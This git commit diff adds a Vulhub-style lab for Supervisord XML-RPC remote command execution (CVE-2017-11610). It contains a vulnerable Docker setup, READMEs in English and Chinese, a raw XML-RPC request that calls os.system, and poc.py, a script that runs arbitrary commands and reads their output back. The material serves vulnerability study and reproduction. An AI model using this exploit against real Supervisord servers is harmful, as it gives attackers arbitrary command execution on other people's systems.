first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 16 KiB

View File

@@ -0,0 +1,17 @@
FROM vulhub/python:2.7
LABEL maintainer="phithon <root@leavesongs.com>"
COPY docker-entrypoint.sh /usr/local/bin/
RUN pip install -U pip \
&& pip install "supervisor==3.3.2" \
&& echo_supervisord_conf | tee /usr/local/etc/supervisord.conf \
&& { \
echo "[inet_http_server]"; \
echo "port=0.0.0.0:9001"; \
echo; \
} | tee -a /usr/local/etc/supervisord.conf \
&& chmod +x /usr/local/bin/docker-entrypoint.sh
CMD ["/usr/local/bin/docker-entrypoint.sh"]

View File

@@ -0,0 +1,79 @@
# Supervisord XML-RPC Remote Command Execution (CVE-2017-11610)
[中文版本(Chinese version)](README.zh-cn.md)
Supervisord is a process control system for Unix-like operating systems.
In the supervisor version before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3, a remote code execution vulnerability exists in its XML-RPC interface, which allows attackers to execute arbitrary commands through specially crafted XML-RPC requests.
References:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
## Environment Setup
Execute the following commands to start Supervisord 3.3.2:
```
docker compose build
docker compose up -d
```
After the server starts, you can access the Supervisord interface at `http://your-ip:9001`.
## Vulnerability Reproduction
Send the following request to the XML-RPC interface, and the command will be executed:
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
![](01.png)
### POC with Direct Output
@Ricter proposed an effective approach on Weibo: write the command execution results to a log file, then use Supervisord's built-in readLog method to read the log file and retrieve the results.
Here's a simple POC [poc.py](poc.py):
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
Execute with Python3 to get the results: `./poc.py "http://your-ip:9001/RPC2" "command"`
![](02.png)

View File

@@ -0,0 +1,77 @@
# Supervisord XML-RPC 远程命令执行漏洞CVE-2017-11610
Supervisord 是一个用于 Unix 类操作系统的进程控制系统。
在 Supervisord 3.0.13.1.43.2.43.3.3 版本之前,在其 XML-RPC 接口中存在一个远程代码执行漏洞,攻击者可以通过特制的 XML-RPC 请求执行任意命令。
参考链接:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
## 环境搭建
执行如下命令启动 Supervisord 3.3.2
```
docker compose build
docker compose up -d
```
环境启动后,访问`http://your-ip:9001`即可查看Supervisord的页面。
## 漏洞复现
发送如下请求,即可执行任意命令:
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
![](01.png)
### 关于直接回显的POC
@Ricter 在微博上提出的一个思路甚是有效就是将命令执行的结果写入log文件中再调用Supervisord自带的readLog方法读取log文件将结果读出来。
写了个简单的POC [poc.py](poc.py)
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
使用Python3执行并获取结果`./poc.py "http://your-ip:9001/RPC2" "command"`
![](02.png)

View File

@@ -0,0 +1,5 @@
services:
web:
build: .
ports:
- "9001:9001"

View File

@@ -0,0 +1,5 @@
#!/bin/bash
supervisord --user nobody -c /usr/local/etc/supervisord.conf
while true; do sleep 30; done;

View File

@@ -0,0 +1,15 @@
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])